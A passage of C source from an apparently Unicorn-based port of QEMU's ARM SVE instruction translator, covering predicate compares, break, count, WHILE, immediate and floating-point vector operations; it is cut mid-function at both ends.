pd, tcg_ctx->cpu_env, pred_full_reg_offset(s, a->rd)); tcg_gen_addi_ptr(tcg_ctx, zn, tcg_ctx->cpu_env, vec_full_reg_offset(s, a->rn)); tcg_gen_addi_ptr(tcg_ctx, pg, tcg_ctx->cpu_env, pred_full_reg_offset(s, a->pg)); gen_fn(tcg_ctx, t, pd, zn, pg, t); tcg_temp_free_ptr(tcg_ctx, pd); 
tcg_temp_free_ptr(tcg_ctx, zn); tcg_temp_free_ptr(tcg_ctx, pg); do_pred_flags(tcg_ctx, t); tcg_temp_free_i32(tcg_ctx, t); return true; } #define DO_PPZI(NAME, name) \ static bool trans_##NAME##_ppzi(DisasContext *s, arg_rpri_esz *a) \ { \ static gen_helper_gvec_flags_3 * const fns[4] = { \ gen_helper_sve_##name##_ppzi_b, gen_helper_sve_##name##_ppzi_h, \ gen_helper_sve_##name##_ppzi_s, gen_helper_sve_##name##_ppzi_d, \ }; \ return do_ppzi_flags(s, a, fns[a->esz]); \ } DO_PPZI(CMPEQ, cmpeq) DO_PPZI(CMPNE, cmpne) DO_PPZI(CMPGT, cmpgt) DO_PPZI(CMPGE, cmpge) DO_PPZI(CMPHI, cmphi) DO_PPZI(CMPHS, cmphs) DO_PPZI(CMPLT, cmplt) DO_PPZI(CMPLE, cmple) DO_PPZI(CMPLO, cmplo) DO_PPZI(CMPLS, cmpls) #undef DO_PPZI /* *** SVE Partition Break Group */ static bool do_brk3(DisasContext *s, arg_rprr_s *a, gen_helper_gvec_4 *fn, gen_helper_gvec_flags_4 *fn_s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (!sve_access_check(s)) { return true; } unsigned vsz = pred_full_reg_size(s); /* Predicate sizes may be smaller and cannot use simd_desc. */ TCGv_ptr d = tcg_temp_new_ptr(tcg_ctx); TCGv_ptr n = tcg_temp_new_ptr(tcg_ctx); TCGv_ptr m = tcg_temp_new_ptr(tcg_ctx); TCGv_ptr g = tcg_temp_new_ptr(tcg_ctx); TCGv_i32 t = tcg_const_i32(tcg_ctx, vsz - 2); tcg_gen_addi_ptr(tcg_ctx, d, tcg_ctx->cpu_env, pred_full_reg_offset(s, a->rd)); tcg_gen_addi_ptr(tcg_ctx, n, tcg_ctx->cpu_env, pred_full_reg_offset(s, a->rn)); tcg_gen_addi_ptr(tcg_ctx, m, tcg_ctx->cpu_env, pred_full_reg_offset(s, a->rm)); tcg_gen_addi_ptr(tcg_ctx, g, tcg_ctx->cpu_env, pred_full_reg_offset(s, a->pg)); if (a->s) { fn_s(tcg_ctx, t, d, n, m, g, t); do_pred_flags(tcg_ctx, t); } else { fn(tcg_ctx, d, n, m, g, t); } tcg_temp_free_ptr(tcg_ctx, d); tcg_temp_free_ptr(tcg_ctx, n); tcg_temp_free_ptr(tcg_ctx, m); tcg_temp_free_ptr(tcg_ctx, g); tcg_temp_free_i32(tcg_ctx, t); return true; } static bool do_brk2(DisasContext *s, arg_rpr_s *a, gen_helper_gvec_3 *fn, gen_helper_gvec_flags_3 *fn_s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (!sve_access_check(s)) { return true; } unsigned vsz = pred_full_reg_size(s); /* Predicate sizes may be smaller and cannot use simd_desc. 
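* simd_desc() can only encode operation sizes that are multiples of
* 8 bytes, while a predicate register is only vsz/8 bytes (any
* multiple of 2), so the raw byte count minus 2 is passed as the
* descriptor instead.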
*/ TCGv_ptr d = tcg_temp_new_ptr(tcg_ctx); TCGv_ptr n = tcg_temp_new_ptr(tcg_ctx); TCGv_ptr g = tcg_temp_new_ptr(tcg_ctx); TCGv_i32 t = tcg_const_i32(tcg_ctx, vsz - 2); tcg_gen_addi_ptr(tcg_ctx, d, tcg_ctx->cpu_env, pred_full_reg_offset(s, a->rd)); tcg_gen_addi_ptr(tcg_ctx, n, tcg_ctx->cpu_env, pred_full_reg_offset(s, a->rn)); tcg_gen_addi_ptr(tcg_ctx, g, tcg_ctx->cpu_env, pred_full_reg_offset(s, a->pg)); if (a->s) { fn_s(tcg_ctx, t, d, n, g, t); do_pred_flags(tcg_ctx, t); } else { fn(tcg_ctx, d, n, g, t); } tcg_temp_free_ptr(tcg_ctx, d); tcg_temp_free_ptr(tcg_ctx, n); tcg_temp_free_ptr(tcg_ctx, g); tcg_temp_free_i32(tcg_ctx, t); return true; } static bool trans_BRKPA(DisasContext *s, arg_rprr_s *a) { return do_brk3(s, a, gen_helper_sve_brkpa, gen_helper_sve_brkpas); } static bool trans_BRKPB(DisasContext *s, arg_rprr_s *a) { return do_brk3(s, a, gen_helper_sve_brkpb, gen_helper_sve_brkpbs); } static bool trans_BRKA_m(DisasContext *s, arg_rpr_s *a) { return do_brk2(s, a, gen_helper_sve_brka_m, gen_helper_sve_brkas_m); } static bool trans_BRKB_m(DisasContext *s, arg_rpr_s *a) { return do_brk2(s, a, gen_helper_sve_brkb_m, gen_helper_sve_brkbs_m); } static bool trans_BRKA_z(DisasContext *s, arg_rpr_s *a) { return do_brk2(s, a, gen_helper_sve_brka_z, gen_helper_sve_brkas_z); } static bool trans_BRKB_z(DisasContext *s, arg_rpr_s *a) { return do_brk2(s, a, gen_helper_sve_brkb_z, gen_helper_sve_brkbs_z); } static bool trans_BRKN(DisasContext *s, arg_rpr_s *a) { return do_brk2(s, a, gen_helper_sve_brkn, gen_helper_sve_brkns); } /* *** SVE Predicate Count Group */ static void do_cntp(DisasContext *s, TCGv_i64 val, int esz, int pn, int pg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned psz = pred_full_reg_size(s); if (psz <= 8) { uint64_t psz_mask; tcg_gen_ld_i64(tcg_ctx, val, tcg_ctx->cpu_env, pred_full_reg_offset(s, pn)); if (pn != pg) { TCGv_i64 g = tcg_temp_new_i64(tcg_ctx); tcg_gen_ld_i64(tcg_ctx, g, tcg_ctx->cpu_env, pred_full_reg_offset(s, pg)); tcg_gen_and_i64(tcg_ctx, val, val, g); tcg_temp_free_i64(tcg_ctx, g); } /* Reduce the pred_esz_masks value simply to reduce the * size of the code generated here. 
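* pred_esz_masks[esz] has one bit set at the predicate position that
* governs each element of the given size; anding with psz_mask
* discards bits beyond the actual predicate width before ctpop
* counts the active elements.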
*/ psz_mask = MAKE_64BIT_MASK(0, psz * 8); tcg_gen_andi_i64(tcg_ctx, val, val, pred_esz_masks[esz] & psz_mask); tcg_gen_ctpop_i64(tcg_ctx, val, val); } else { TCGv_ptr t_pn = tcg_temp_new_ptr(tcg_ctx); TCGv_ptr t_pg = tcg_temp_new_ptr(tcg_ctx); unsigned desc; TCGv_i32 t_desc; desc = psz - 2; desc = deposit32(desc, SIMD_DATA_SHIFT, 2, esz); tcg_gen_addi_ptr(tcg_ctx, t_pn, tcg_ctx->cpu_env, pred_full_reg_offset(s, pn)); tcg_gen_addi_ptr(tcg_ctx, t_pg, tcg_ctx->cpu_env, pred_full_reg_offset(s, pg)); t_desc = tcg_const_i32(tcg_ctx, desc); gen_helper_sve_cntp(tcg_ctx, val, t_pn, t_pg, t_desc); tcg_temp_free_ptr(tcg_ctx, t_pn); tcg_temp_free_ptr(tcg_ctx, t_pg); tcg_temp_free_i32(tcg_ctx, t_desc); } } static bool trans_CNTP(DisasContext *s, arg_CNTP *a) { if (sve_access_check(s)) { do_cntp(s, cpu_reg(s, a->rd), a->esz, a->rn, a->pg); } return true; } static bool trans_INCDECP_r(DisasContext *s, arg_incdec_pred *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { TCGv_i64 reg = cpu_reg(s, a->rd); TCGv_i64 val = tcg_temp_new_i64(tcg_ctx); do_cntp(s, val, a->esz, a->pg, a->pg); if (a->d) { tcg_gen_sub_i64(tcg_ctx, reg, reg, val); } else { tcg_gen_add_i64(tcg_ctx, reg, reg, val); } tcg_temp_free_i64(tcg_ctx, val); } return true; } static bool trans_INCDECP_z(DisasContext *s, arg_incdec2_pred *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (a->esz == 0) { return false; } if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); TCGv_i64 val = tcg_temp_new_i64(tcg_ctx); GVecGen2sFn *gvec_fn = a->d ? tcg_gen_gvec_subs : tcg_gen_gvec_adds; do_cntp(s, val, a->esz, a->pg, a->pg); gvec_fn(tcg_ctx, a->esz, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), val, vsz, vsz); } return true; } static bool trans_SINCDECP_r_32(DisasContext *s, arg_incdec_pred *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { TCGv_i64 reg = cpu_reg(s, a->rd); TCGv_i64 val = tcg_temp_new_i64(tcg_ctx); do_cntp(s, val, a->esz, a->pg, a->pg); do_sat_addsub_32(tcg_ctx, reg, val, a->u, a->d); } return true; } static bool trans_SINCDECP_r_64(DisasContext *s, arg_incdec_pred *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { TCGv_i64 reg = cpu_reg(s, a->rd); TCGv_i64 val = tcg_temp_new_i64(tcg_ctx); do_cntp(s, val, a->esz, a->pg, a->pg); do_sat_addsub_64(tcg_ctx, reg, val, a->u, a->d); } return true; } static bool trans_SINCDECP_z(DisasContext *s, arg_incdec2_pred *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (a->esz == 0) { return false; } if (sve_access_check(s)) { TCGv_i64 val = tcg_temp_new_i64(tcg_ctx); do_cntp(s, val, a->esz, a->pg, a->pg); do_sat_addsub_vec(s, a->esz, a->rd, a->rn, val, a->u, a->d); } return true; } /* *** SVE Integer Compare Scalars Group */ static bool trans_CTERM(DisasContext *s, arg_CTERM *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (!sve_access_check(s)) { return true; } TCGCond cond = (a->ne ? TCG_COND_NE : TCG_COND_EQ); TCGv_i64 rn = read_cpu_reg(s, a->rn, a->sf); TCGv_i64 rm = read_cpu_reg(s, a->rm, a->sf); TCGv_i64 cmp = tcg_temp_new_i64(tcg_ctx); tcg_gen_setcond_i64(tcg_ctx, cond, cmp, rn, rm); tcg_gen_extrl_i64_i32(tcg_ctx, tcg_ctx->cpu_NF, cmp); tcg_temp_free_i64(tcg_ctx, cmp); /* VF = !NF & !CF. */ tcg_gen_xori_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_NF, 1); tcg_gen_andc_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_VF, tcg_ctx->cpu_CF); /* Both NF and VF actually look at bit 31. 
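* QEMU stores NF and VF as 32-bit values whose bit 31 is the flag,
* so negating the 0/1 setcond result (0 -> 0, 1 -> 0xffffffff)
* places the flag in bit 31 as required.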
*/ tcg_gen_neg_i32(tcg_ctx, tcg_ctx->cpu_NF, tcg_ctx->cpu_NF); tcg_gen_neg_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_VF); return true; } static bool trans_WHILE(DisasContext *s, arg_WHILE *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 op0, op1, t0, t1, tmax; TCGv_i32 t2, t3; TCGv_ptr ptr; unsigned desc, vsz = vec_full_reg_size(s); TCGCond cond; if (!sve_access_check(s)) { return true; } op0 = read_cpu_reg(s, a->rn, 1); op1 = read_cpu_reg(s, a->rm, 1); if (!a->sf) { if (a->u) { tcg_gen_ext32u_i64(tcg_ctx, op0, op0); tcg_gen_ext32u_i64(tcg_ctx, op1, op1); } else { tcg_gen_ext32s_i64(tcg_ctx, op0, op0); tcg_gen_ext32s_i64(tcg_ctx, op1, op1); } } /* For the helper, compress the different conditions into a computation * of how many iterations for which the condition is true. */ t0 = tcg_temp_new_i64(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_sub_i64(tcg_ctx, t0, op1, op0); tmax = tcg_const_i64(tcg_ctx, vsz >> a->esz); if (a->eq) { /* Equality means one more iteration. */ tcg_gen_addi_i64(tcg_ctx, t0, t0, 1); /* If op1 is max (un)signed integer (and the only time the addition * above could overflow), then we produce an all-true predicate by * setting the count to the vector length. This is because the * pseudocode is described as an increment + compare loop, and the * max integer would always compare true. */ tcg_gen_movi_i64(tcg_ctx, t1, (a->sf ? (a->u ? UINT64_MAX : INT64_MAX) : (a->u ? UINT32_MAX : INT32_MAX))); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_EQ, t0, op1, t1, tmax, t0); } /* Bound to the maximum. */ tcg_gen_umin_i64(tcg_ctx, t0, t0, tmax); tcg_temp_free_i64(tcg_ctx, tmax); /* Set the count to zero if the condition is false. */ cond = (a->u ? (a->eq ? TCG_COND_LEU : TCG_COND_LTU) : (a->eq ? TCG_COND_LE : TCG_COND_LT)); tcg_gen_movi_i64(tcg_ctx, t1, 0); tcg_gen_movcond_i64(tcg_ctx, cond, t0, op0, op1, t0, t1); tcg_temp_free_i64(tcg_ctx, t1); /* Since we're bounded, pass as a 32-bit type. */ t2 = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, t2, t0); tcg_temp_free_i64(tcg_ctx, t0); /* Scale elements to bits. */ tcg_gen_shli_i32(tcg_ctx, t2, t2, a->esz); desc = (vsz / 8) - 2; desc = deposit32(desc, SIMD_DATA_SHIFT, 2, a->esz); t3 = tcg_const_i32(tcg_ctx, desc); ptr = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, ptr, tcg_ctx->cpu_env, pred_full_reg_offset(s, a->rd)); gen_helper_sve_while(tcg_ctx, t2, ptr, t2, t3); do_pred_flags(tcg_ctx, t2); tcg_temp_free_ptr(tcg_ctx, ptr); tcg_temp_free_i32(tcg_ctx, t2); tcg_temp_free_i32(tcg_ctx, t3); return true; } /* *** SVE Integer Wide Immediate - Unpredicated Group */ static bool trans_FDUP(DisasContext *s, arg_FDUP *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (a->esz == 0) { return false; } if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); int dofs = vec_full_reg_offset(s, a->rd); uint64_t imm; /* Decode the VFP immediate. 
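* vfp_expand_imm() turns the 8-bit encoded constant into a full
* float of the element size; dup_const() then replicates that
* element across a 64-bit pattern for the vector-wide dup.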
*/ imm = vfp_expand_imm(a->esz, a->imm); imm = dup_const(a->esz, imm); tcg_gen_gvec_dup64i(tcg_ctx, dofs, vsz, vsz, imm); } return true; } static bool trans_DUP_i(DisasContext *s, arg_DUP_i *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (a->esz == 0 && extract32(s->insn, 13, 1)) { return false; } if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); int dofs = vec_full_reg_offset(s, a->rd); tcg_gen_gvec_dup64i(tcg_ctx, dofs, vsz, vsz, dup_const(a->esz, a->imm)); } return true; } static bool trans_ADD_zzi(DisasContext *s, arg_rri_esz *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (a->esz == 0 && extract32(s->insn, 13, 1)) { return false; } if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); tcg_gen_gvec_addi(tcg_ctx, a->esz, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), a->imm, vsz, vsz); } return true; } static bool trans_SUB_zzi(DisasContext *s, arg_rri_esz *a) { a->imm = -a->imm; return trans_ADD_zzi(s, a); } static bool trans_SUBR_zzi(DisasContext *s, arg_rri_esz *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; static const TCGOpcode vecop_list[] = { INDEX_op_sub_vec, 0 }; static const GVecGen2s op[4] = { { .fni8 = tcg_gen_vec_sub8_i64, .fniv = tcg_gen_sub_vec, .fno = gen_helper_sve_subri_b, .opt_opc = vecop_list, .vece = MO_8, .scalar_first = true }, { .fni8 = tcg_gen_vec_sub16_i64, .fniv = tcg_gen_sub_vec, .fno = gen_helper_sve_subri_h, .opt_opc = vecop_list, .vece = MO_16, .scalar_first = true }, { .fni4 = tcg_gen_sub_i32, .fniv = tcg_gen_sub_vec, .fno = gen_helper_sve_subri_s, .opt_opc = vecop_list, .vece = MO_32, .scalar_first = true }, { .fni8 = tcg_gen_sub_i64, .fniv = tcg_gen_sub_vec, .fno = gen_helper_sve_subri_d, .opt_opc = vecop_list, .prefer_i64 = TCG_TARGET_REG_BITS == 64, .vece = MO_64, .scalar_first = true } }; if (a->esz == 0 && extract32(s->insn, 13, 1)) { return false; } if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); TCGv_i64 c = tcg_const_i64(tcg_ctx, a->imm); tcg_gen_gvec_2s(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), vsz, vsz, c, &op[a->esz]); tcg_temp_free_i64(tcg_ctx, c); } return true; } static bool trans_MUL_zzi(DisasContext *s, arg_rri_esz *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); tcg_gen_gvec_muli(tcg_ctx, a->esz, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), a->imm, vsz, vsz); } return true; } static bool do_zzi_sat(DisasContext *s, arg_rri_esz *a, bool u, bool d) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (a->esz == 0 && extract32(s->insn, 13, 1)) { return false; } if (sve_access_check(s)) { TCGv_i64 val = tcg_const_i64(tcg_ctx, a->imm); do_sat_addsub_vec(s, a->esz, a->rd, a->rn, val, u, d); tcg_temp_free_i64(tcg_ctx, val); } return true; } static bool trans_SQADD_zzi(DisasContext *s, arg_rri_esz *a) { return do_zzi_sat(s, a, false, false); } static bool trans_UQADD_zzi(DisasContext *s, arg_rri_esz *a) { return do_zzi_sat(s, a, true, false); } static bool trans_SQSUB_zzi(DisasContext *s, arg_rri_esz *a) { return do_zzi_sat(s, a, false, true); } static bool trans_UQSUB_zzi(DisasContext *s, arg_rri_esz *a) { return do_zzi_sat(s, a, true, true); } static bool do_zzi_ool(DisasContext *s, arg_rri_esz *a, gen_helper_gvec_2i *fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); TCGv_i64 c = tcg_const_i64(tcg_ctx, a->imm); tcg_gen_gvec_2i_ool(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), c, vsz, vsz, 0, fn); 
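/* The immediate travels as a TCGv_i64 scalar operand rather than in
 * the 32-bit descriptor data field, matching the gvec_2i_ool
 * calling convention.
 */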
tcg_temp_free_i64(tcg_ctx, c); } return true; } #define DO_ZZI(NAME, name) \ static bool trans_##NAME##_zzi(DisasContext *s, arg_rri_esz *a) \ { \ static gen_helper_gvec_2i * const fns[4] = { \ gen_helper_sve_##name##i_b, gen_helper_sve_##name##i_h, \ gen_helper_sve_##name##i_s, gen_helper_sve_##name##i_d, \ }; \ return do_zzi_ool(s, a, fns[a->esz]); \ } DO_ZZI(SMAX, smax) DO_ZZI(UMAX, umax) DO_ZZI(SMIN, smin) DO_ZZI(UMIN, umin) #undef DO_ZZI static bool trans_DOT_zzz(DisasContext *s, arg_DOT_zzz *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; static gen_helper_gvec_3 * const fns[2][2] = { { gen_helper_gvec_sdot_b, gen_helper_gvec_sdot_h }, { gen_helper_gvec_udot_b, gen_helper_gvec_udot_h } }; if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); tcg_gen_gvec_3_ool(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), vec_full_reg_offset(s, a->rm), vsz, vsz, 0, fns[a->u][a->sz]); } return true; } static bool trans_DOT_zzx(DisasContext *s, arg_DOT_zzx *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; static gen_helper_gvec_3 * const fns[2][2] = { { gen_helper_gvec_sdot_idx_b, gen_helper_gvec_sdot_idx_h }, { gen_helper_gvec_udot_idx_b, gen_helper_gvec_udot_idx_h } }; if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); tcg_gen_gvec_3_ool(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), vec_full_reg_offset(s, a->rm), vsz, vsz, a->index, fns[a->u][a->sz]); } return true; } /* *** SVE Floating Point Multiply-Add Indexed Group */ static bool trans_FMLA_zzxz(DisasContext *s, arg_FMLA_zzxz *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; static gen_helper_gvec_4_ptr * const fns[3] = { gen_helper_gvec_fmla_idx_h, gen_helper_gvec_fmla_idx_s, gen_helper_gvec_fmla_idx_d, }; if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); TCGv_ptr status = get_fpstatus_ptr(tcg_ctx, a->esz == MO_16); tcg_gen_gvec_4_ptr(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), vec_full_reg_offset(s, a->rm), vec_full_reg_offset(s, a->ra), status, vsz, vsz, (a->index << 1) | a->sub, fns[a->esz - 1]); tcg_temp_free_ptr(tcg_ctx, status); } return true; } /* *** SVE Floating Point Multiply Indexed Group */ static bool trans_FMUL_zzx(DisasContext *s, arg_FMUL_zzx *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; static gen_helper_gvec_3_ptr * const fns[3] = { gen_helper_gvec_fmul_idx_h, gen_helper_gvec_fmul_idx_s, gen_helper_gvec_fmul_idx_d, }; if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); TCGv_ptr status = get_fpstatus_ptr(tcg_ctx, a->esz == MO_16); tcg_gen_gvec_3_ptr(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), vec_full_reg_offset(s, a->rm), status, vsz, vsz, a->index, fns[a->esz - 1]); tcg_temp_free_ptr(tcg_ctx, status); } return true; } /* *** SVE Floating Point Fast Reduction Group */ typedef void gen_helper_fp_reduce(TCGContext *, TCGv_i64, TCGv_ptr, TCGv_ptr, TCGv_ptr, TCGv_i32); static void do_reduce(DisasContext *s, arg_rpr_esz *a, gen_helper_fp_reduce *fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned vsz = vec_full_reg_size(s); unsigned p2vsz = pow2ceil(vsz); TCGv_i32 t_desc = tcg_const_i32(tcg_ctx, simd_desc(vsz, p2vsz, 0)); TCGv_ptr t_zn, t_pg, status; TCGv_i64 temp; temp = tcg_temp_new_i64(tcg_ctx); t_zn = tcg_temp_new_ptr(tcg_ctx); t_pg = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, t_zn, tcg_ctx->cpu_env, vec_full_reg_offset(s, a->rn)); tcg_gen_addi_ptr(tcg_ctx, t_pg, tcg_ctx->cpu_env, pred_full_reg_offset(s, a->pg)); status = get_fpstatus_ptr(tcg_ctx, a->esz == MO_16); fn(tcg_ctx, temp, 
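/* Passing maxsz = pow2ceil(vsz) lets the helper pad the operation
 * out to a power of two with identity elements and perform a simple
 * pairwise tree reduction.
 */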
t_zn, t_pg, status, t_desc); tcg_temp_free_ptr(tcg_ctx, t_zn); tcg_temp_free_ptr(tcg_ctx, t_pg); tcg_temp_free_ptr(tcg_ctx, status); tcg_temp_free_i32(tcg_ctx, t_desc); write_fp_dreg(s, a->rd, temp); tcg_temp_free_i64(tcg_ctx, temp); } #define DO_VPZ(NAME, name) \ static bool trans_##NAME(DisasContext *s, arg_rpr_esz *a) \ { \ static gen_helper_fp_reduce * const fns[3] = { \ gen_helper_sve_##name##_h, \ gen_helper_sve_##name##_s, \ gen_helper_sve_##name##_d, \ }; \ if (a->esz == 0) { \ return false; \ } \ if (sve_access_check(s)) { \ do_reduce(s, a, fns[a->esz - 1]); \ } \ return true; \ } DO_VPZ(FADDV, faddv) DO_VPZ(FMINNMV, fminnmv) DO_VPZ(FMAXNMV, fmaxnmv) DO_VPZ(FMINV, fminv) DO_VPZ(FMAXV, fmaxv) /* *** SVE Floating Point Unary Operations - Unpredicated Group */ static void do_zz_fp(DisasContext *s, arg_rr_esz *a, gen_helper_gvec_2_ptr *fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned vsz = vec_full_reg_size(s); TCGv_ptr status = get_fpstatus_ptr(tcg_ctx, a->esz == MO_16); tcg_gen_gvec_2_ptr(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), status, vsz, vsz, 0, fn); tcg_temp_free_ptr(tcg_ctx, status); } static bool trans_FRECPE(DisasContext *s, arg_rr_esz *a) { static gen_helper_gvec_2_ptr * const fns[3] = { gen_helper_gvec_frecpe_h, gen_helper_gvec_frecpe_s, gen_helper_gvec_frecpe_d, }; if (a->esz == 0) { return false; } if (sve_access_check(s)) { do_zz_fp(s, a, fns[a->esz - 1]); } return true; } static bool trans_FRSQRTE(DisasContext *s, arg_rr_esz *a) { static gen_helper_gvec_2_ptr * const fns[3] = { gen_helper_gvec_frsqrte_h, gen_helper_gvec_frsqrte_s, gen_helper_gvec_frsqrte_d, }; if (a->esz == 0) { return false; } if (sve_access_check(s)) { do_zz_fp(s, a, fns[a->esz - 1]); } return true; } /* *** SVE Floating Point Compare with Zero Group */ static void do_ppz_fp(DisasContext *s, arg_rpr_esz *a, gen_helper_gvec_3_ptr *fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned vsz = vec_full_reg_size(s); TCGv_ptr status = get_fpstatus_ptr(tcg_ctx, a->esz == MO_16); tcg_gen_gvec_3_ptr(tcg_ctx, pred_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), pred_full_reg_offset(s, a->pg), status, vsz, vsz, 0, fn); tcg_temp_free_ptr(tcg_ctx, status); } #define DO_PPZ(NAME, name) \ static bool trans_##NAME(DisasContext *s, arg_rpr_esz *a) \ { \ static gen_helper_gvec_3_ptr * const fns[3] = { \ gen_helper_sve_##name##_h, \ gen_helper_sve_##name##_s, \ gen_helper_sve_##name##_d, \ }; \ if (a->esz == 0) { \ return false; \ } \ if (sve_access_check(s)) { \ do_ppz_fp(s, a, fns[a->esz - 1]); \ } \ return true; \ } DO_PPZ(FCMGE_ppz0, fcmge0) DO_PPZ(FCMGT_ppz0, fcmgt0) DO_PPZ(FCMLE_ppz0, fcmle0) DO_PPZ(FCMLT_ppz0, fcmlt0) DO_PPZ(FCMEQ_ppz0, fcmeq0) DO_PPZ(FCMNE_ppz0, fcmne0) #undef DO_PPZ /* *** SVE floating-point trig multiply-add coefficient */ static bool trans_FTMAD(DisasContext *s, arg_FTMAD *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; static gen_helper_gvec_3_ptr * const fns[3] = { gen_helper_sve_ftmad_h, gen_helper_sve_ftmad_s, gen_helper_sve_ftmad_d, }; if (a->esz == 0) { return false; } if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); TCGv_ptr status = get_fpstatus_ptr(tcg_ctx, a->esz == MO_16); tcg_gen_gvec_3_ptr(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), vec_full_reg_offset(s, a->rm), status, vsz, vsz, a->imm, fns[a->esz - 1]); tcg_temp_free_ptr(tcg_ctx, status); } return true; } /* *** SVE Floating Point Accumulating Reduction Group */ static bool trans_FADDA(DisasContext *s, arg_rprr_esz *a) { TCGContext *tcg_ctx = 
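/* FADDA accumulates strictly from left to right across the active
 * elements, so a single out-of-line helper call threads the scalar
 * accumulator (t_val) in and back out.
 */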
s->uc->tcg_ctx; typedef void fadda_fn(TCGContext *, TCGv_i64, TCGv_i64, TCGv_ptr, TCGv_ptr, TCGv_ptr, TCGv_i32); static fadda_fn * const fns[3] = { gen_helper_sve_fadda_h, gen_helper_sve_fadda_s, gen_helper_sve_fadda_d, }; unsigned vsz = vec_full_reg_size(s); TCGv_ptr t_rm, t_pg, t_fpst; TCGv_i64 t_val; TCGv_i32 t_desc; if (a->esz == 0) { return false; } if (!sve_access_check(s)) { return true; } t_val = load_esz(tcg_ctx, tcg_ctx->cpu_env, vec_reg_offset(s, a->rn, 0, a->esz), a->esz); t_rm = tcg_temp_new_ptr(tcg_ctx); t_pg = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, t_rm, tcg_ctx->cpu_env, vec_full_reg_offset(s, a->rm)); tcg_gen_addi_ptr(tcg_ctx, t_pg, tcg_ctx->cpu_env, pred_full_reg_offset(s, a->pg)); t_fpst = get_fpstatus_ptr(tcg_ctx, a->esz == MO_16); t_desc = tcg_const_i32(tcg_ctx, simd_desc(vsz, vsz, 0)); fns[a->esz - 1](tcg_ctx,t_val, t_val, t_rm, t_pg, t_fpst, t_desc); tcg_temp_free_i32(tcg_ctx, t_desc); tcg_temp_free_ptr(tcg_ctx, t_fpst); tcg_temp_free_ptr(tcg_ctx, t_pg); tcg_temp_free_ptr(tcg_ctx, t_rm); write_fp_dreg(s, a->rd, t_val); tcg_temp_free_i64(tcg_ctx, t_val); return true; } /* *** SVE Floating Point Arithmetic - Unpredicated Group */ static bool do_zzz_fp(DisasContext *s, arg_rrr_esz *a, gen_helper_gvec_3_ptr *fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (fn == NULL) { return false; } if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); TCGv_ptr status = get_fpstatus_ptr(tcg_ctx, a->esz == MO_16); tcg_gen_gvec_3_ptr(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), vec_full_reg_offset(s, a->rm), status, vsz, vsz, 0, fn); tcg_temp_free_ptr(tcg_ctx, status); } return true; } #define DO_FP3(NAME, name) \ static bool trans_##NAME(DisasContext *s, arg_rrr_esz *a) \ { \ static gen_helper_gvec_3_ptr * const fns[4] = { \ NULL, gen_helper_gvec_##name##_h, \ gen_helper_gvec_##name##_s, 